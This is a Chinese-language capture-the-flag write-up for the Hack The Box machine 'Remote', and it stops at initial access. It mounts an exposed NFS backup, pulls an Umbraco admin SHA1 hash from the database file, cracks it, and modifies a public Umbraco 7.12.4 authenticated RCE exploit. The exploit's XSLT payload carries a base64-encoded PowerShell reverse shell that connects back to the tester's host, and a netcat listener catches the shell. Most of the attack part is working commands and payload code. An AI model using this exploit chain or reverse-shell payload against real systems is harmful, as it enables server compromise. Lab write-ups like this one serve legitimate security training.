Remote-htb-writeup

0x00 靶场技能介绍

章节技能：目录扫描、nfs服务挂载、Umbraco 凭证文件搜集、哈希破解、Umbraco RCE漏洞利用、POC代码修改、teamviever 7 凭证读取、烂土豆提权

参考链接：部分参考引导模式

0x01 用户权限获取

1、获取下靶机IP地址：10.10.10.180

2、扫描下开放端口情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate 10000 10.10.10.180
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 10:13 CST
Nmap scan report for 10.10.10.180
Host is up (0.29s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49678/tcp open  unknown
49679/tcp open  unknown
49680/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 13.15 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p21,80,111,135,139,445,2049,5985,47001 -sV -sC --min-rate=10000 10.10.10.180
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 10:15 CST
Nmap scan report for 10.10.10.180
Host is up (0.35s latency).

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-03-16T03:16:27
|_  start_date: N/A
|_clock-skew: 59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 282.71 seconds

3、查看下开放端口的这几个网站的信息

4、扫描下80端口的目录情况

┌──(kali㉿offsec)-[~/Desktop]
└─$ dirsearch -u http://10.10.10.180/

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_10.10.10.180/__24-03-16_10-18-32.txt

Target: http://10.10.10.180/

[10:18:32] Starting: 
[10:18:36] 403 -  312B  - /%2e%2e//google.com
[10:18:37] 403 -  312B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd             
[10:18:38] 404 -    2KB - /.ashx                                            
[10:18:38] 404 -    2KB - /.asmx
[10:19:00] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           
[10:19:03] 200 -    2KB - /about-us                                         
[10:19:08] 404 -    2KB - /admin%20/                                        
[10:19:09] 404 -    2KB - /admin.                                           
[10:19:31] 404 -    2KB - /asset..                                          
[10:19:34] 400 -   11B  - /base/                                            
[10:19:34] 500 -    1KB - /base/static/c                                    
[10:19:37] 200 -    2KB - /blog                                             
[10:19:37] 200 -    2KB - /blog/
[10:19:38] 403 -  312B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd     
[10:19:47] 200 -    3KB - /contact                                          
[10:19:47] 200 -    3KB - /contact.aspx                                     
[10:19:54] 400 -    3KB - /docpicker/internal_proxy/https/127.0.0.1:9043/ibm/console
[10:20:10] 200 -    2KB - /home                                             
[10:20:10] 200 -    2KB - /home.aspx                                        
[10:20:14] 404 -    2KB - /index.php.                                       
[10:20:14] 400 -    3KB - /index.php::$DATA                                 
[10:20:15] 302 -  126B  - /INSTALL  ->  /umbraco/                           
[10:20:15] 302 -  126B  - /Install  ->  /umbraco/
[10:20:15] 302 -  126B  - /install  ->  /umbraco/                           
[10:20:16] 302 -  126B  - /install/  ->  /umbraco/                          
[10:20:16] 200 -    1KB - /intranet                                         
[10:20:18] 404 -    2KB - /javax.faces.resource.../WEB-INF/web.xml.jsf      
[10:20:18] 404 -    2KB - /javax.faces.resource.../                         
[10:20:19] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd                                                                                                         
[10:20:19] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[10:20:19] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[10:20:19] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[10:20:19] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[10:20:19] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[10:20:19] 400 -    3KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[10:20:19] 400 -    3KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[10:20:19] 400 -    3KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[10:20:19] 400 -    3KB - /jolokia/exec/java.lang:type=Memory/gc
[10:20:19] 400 -    3KB - /jolokia/search/*:j2eeType=J2EEServer,*
[10:20:19] 400 -    3KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[10:20:26] 404 -    2KB - /login.wdm%20                                     
[10:20:26] 404 -    2KB - /login.wdm%2e                                     
[10:20:31] 500 -    3KB - /master/                                          
[10:20:47] 200 -    2KB - /people                                           
[10:20:57] 200 -    2KB - /products                                         
[10:20:57] 500 -    3KB - /product
[10:20:57] 200 -    2KB - /products.aspx                                    
[10:20:58] 500 -    3KB - /product.aspx
[10:21:00] 404 -    2KB - /rating_over.                                     
[10:21:07] 404 -    2KB - /service.asmx                                     
[10:21:15] 404 -    2KB - /static..                                         
[10:21:24] 403 -    2KB - /Trace.axd                                        
[10:21:24] 400 -    3KB - /Trace.axd::$DATA                                 
[10:21:28] 200 -    6KB - /umbraco/webservices/codeEditorSave.asmx          
[10:21:44] 404 -    2KB - /WEB-INF./web.xml                                 
[10:21:44] 404 -    2KB - /WEB-INF./
[10:21:46] 400 -    3KB - /web.config::$DATA                                
[10:21:47] 404 -    2KB - /WebResource.axd?d=LER8t9aS                       
                                                                             
Task Completed

5、发现个 umbraco 的目录服务

http://10.10.10.180/umbraco/#/login/false?returnPath=%252Fforms

6、这里基本上就没思路了，不过前面其实遗漏了一个端口信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p2049 -sC -sV 10.10.10.180                                                  
[sudo] kali 的密码：
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-16 20:53 CST
Nmap scan report for 10.10.10.180
Host is up (0.29s latency).

PORT     STATE SERVICE VERSION
2049/tcp open  nfs     2-4 (RPC #100003)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.80 seconds

7、是的也就是上一个靶场，我们刚刚练习过的技能，磁盘挂载技术

# https://book.hacktricks.xyz/v/cn/network-services-pentesting/nfs-service-pentesting#gua-zai

┌──(kali㉿offsec)-[~/Desktop]
└─$ showmount -e 10.10.10.180  
Export list for 10.10.10.180:
/site_backups (everyone)

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo mkdir /mnt/new_back             
[sudo] kali 的密码：


┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo mount -t nfs 10.10.10.180:/site_backups /mnt/new_back -o nolock 
                                                                                                               
┌──(kali㉿offsec)-[~/Desktop]
└─$ ls -la /mnt/new_back 
总计 123
drwx------ 2 nobody nogroup  4096 2020年 2月24日 .
drwxr-xr-x 3 root   root     4096  3月16日 21:09 ..
drwx------ 2 nobody nogroup    64 2020年 2月21日 App_Browsers
drwx------ 2 nobody nogroup  4096 2020年 2月21日 App_Data
drwx------ 2 nobody nogroup  4096 2020年 2月21日 App_Plugins
drwx------ 2 nobody nogroup    64 2020年 2月21日 aspnet_client
drwx------ 2 nobody nogroup 49152 2020年 2月21日 bin
drwx------ 2 nobody nogroup  8192 2020年 2月21日 Config
drwx------ 2 nobody nogroup    64 2020年 2月21日 css
-rwx------ 1 nobody nogroup   152 2018年11月 2日 default.aspx
-rwx------ 1 nobody nogroup    89 2018年11月 2日 Global.asax
drwx------ 2 nobody nogroup  4096 2020年 2月21日 Media
drwx------ 2 nobody nogroup    64 2020年 2月21日 scripts
drwx------ 2 nobody nogroup  8192 2020年 2月21日 Umbraco
drwx------ 2 nobody nogroup  4096 2020年 2月21日 Umbraco_Client
drwx------ 2 nobody nogroup  4096 2020年 2月21日 Views
-rwx------ 1 nobody nogroup 28539 2020年 2月20日 Web.config

8、这里省略一部分的无意义的枚举，其实这里应该能看到是一个网站的源码目录，结合思路上应该是需要找 Umbraco 凭证文件才对。

https://stackoverflow.com/questions/36979794/umbraco-database-connection-credentials

您的连接字符串清楚地表明您正在使用默认的 SQL Server CE 数据库 ( Umbraco.sdf)。Umbraco.sdf您可以在文件夹中找到该文件/App_Data。

9、根据提示开始翻阅凭证文件

┌──(kali㉿offsec)-[/mnt/new_back]
└─$ cd App_Data           
                                                                                                               
┌──(kali㉿offsec)-[/mnt/new_back/App_Data]
└─$ ls -la
总计 1977
drwx------ 2 nobody nogroup    4096 2020年 2月21日 .
drwx------ 2 nobody nogroup    4096 2020年 2月24日 ..
drwx------ 2 nobody nogroup      64 2020年 2月21日 cache
drwx------ 2 nobody nogroup    4096 2020年 2月21日 Logs
drwx------ 2 nobody nogroup    4096 2020年 2月21日 Models
drwx------ 2 nobody nogroup      64 2020年 2月21日 packages
drwx------ 2 nobody nogroup    4096 2020年 2月21日 TEMP
-rwx------ 1 nobody nogroup   36832 2020年 2月20日 umbraco.config
-rwx------ 1 nobody nogroup 1965978 2020年 2月20日 Umbraco.sdf
                                                                                                               
┌──(kali㉿offsec)-[/mnt/new_back/App_Data]
└─$ cp Umbraco.sdf ~/Desktop/           
                                                                                                               
┌──(kali㉿offsec)-[/mnt/new_back/App_Data]
└─$ cp umbraco.config ~/Desktop/

10、查看凭证里的管理员账号信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ strings Umbraco.sdf | grep admin 
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating SessionTimeout, SecurityStamp, CreateDate, UpdateDate, Id, HasIdentity
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating Key, IsApproved, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "smith" <smith@htb.local>umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <smith@htb.local>umbraco/user/saveupdating Name, Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/saveupdating Username, Email, Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "ssmith" <ssmith@htb.local>umbraco/user/saveupdating Key, Groups, UpdateDate; groups assigned: writer
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <admin@htb.local>192.168.195.1umbraco/user/sign-in/failedlogin failed
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating FailedPasswordAttempts, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/password/changepassword change
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, LastPasswordChangeDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
adminAdministratorsCADMOSKTPIURZ:5F7
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating TourData, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.137User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/logoutlogout success
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastLoginDate, UpdateDate
User "SYSTEM" 192.168.195.1User "admin" <admin@htb.local>umbraco/user/sign-in/loginlogin success
User "admin" <admin@htb.local>192.168.195.1User "admin" <admin@htb.local>umbraco/user/saveupdating LastPasswordChangeDate, RawPasswordValue, SecurityStamp, UpdateDate

11、开始破解管理员哈希值

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo -n 'b8be16afba8c314ad33d812f22a04991b90e2aaa' > hash
                                                                                                               
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo john hash --format=Raw-SHA1 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 ASIMD 4x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese   (?)     
1g 0:00:00:00 DONE (2024-03-16 21:42) 1.136g/s 11163Kp/s 11163Kc/s 11163KC/s baconandchipies1..baconandcabbage
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed. 

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 100 hash /usr/share/wordlists/rockyou.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa:baconandcheese

12、到这里就获取到了账号密码信息了

1 2	`admin@htb.local baconandcheese`

13、开始登录首页的网站后台

http://10.10.10.180/umbraco/#/forms

14、进入到后台后，我们发现了版本信息等

1
2
3

admin

Umbraco version 7.12.4 assembly: 1.0.6879.21982

15、开始搜索相关漏洞进行利用

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit umbraco 7.12.4
----------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                               |  Path
----------------------------------------------------------------------------- ---------------------------------
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                   | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                   | aspx/webapps/49488.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results


┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m 46153               
  Exploit: Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46153
     Path: /usr/share/exploitdb/exploits/aspx/webapps/46153.py
    Codes: N/A
 Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/46153.py

16、这里这个poc需要自己调试一下具体的参数

login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";

# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c ping 10.10.14.8"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

17、这里先使用ping命令，看看能否执行命令成功

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 46153.py
Start
[]
End

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
22:05:28.264515 IP 10.10.10.180 > 10.10.14.8: ICMP echo request, id 1, seq 1, length 40
22:05:28.264652 IP 10.10.14.8 > 10.10.10.180: ICMP echo reply, id 1, seq 1, length 40
22:05:29.274109 IP 10.10.10.180 > 10.10.14.8: ICMP echo request, id 1, seq 2, length 40
22:05:29.274167 IP 10.10.14.8 > 10.10.10.180: ICMP echo reply, id 1, seq 2, length 40
22:05:30.269543 IP 10.10.10.180 > 10.10.14.8: ICMP echo request, id 1, seq 3, length 40
22:05:30.269602 IP 10.10.14.8 > 10.10.10.180: ICMP echo reply, id 1, seq 3, length 40
22:05:31.262638 IP 10.10.10.180 > 10.10.14.8: ICMP echo request, id 1, seq 4, length 40
22:05:31.262695 IP 10.10.14.8 > 10.10.10.180: ICMP echo reply, id 1, seq 4, length 40
^C
8 packets captured
8 packets received by filter
0 packets dropped by kernel

18、这里修改下利用代码直接构造一个反弹shell过来

# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "/c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "cmd.exe"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

https://sh1yan.top/rt-cmd/

19、开始利用，获取初始权限

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 46153.py
Start
[]

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443        
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.180] 49707
whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> 
PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
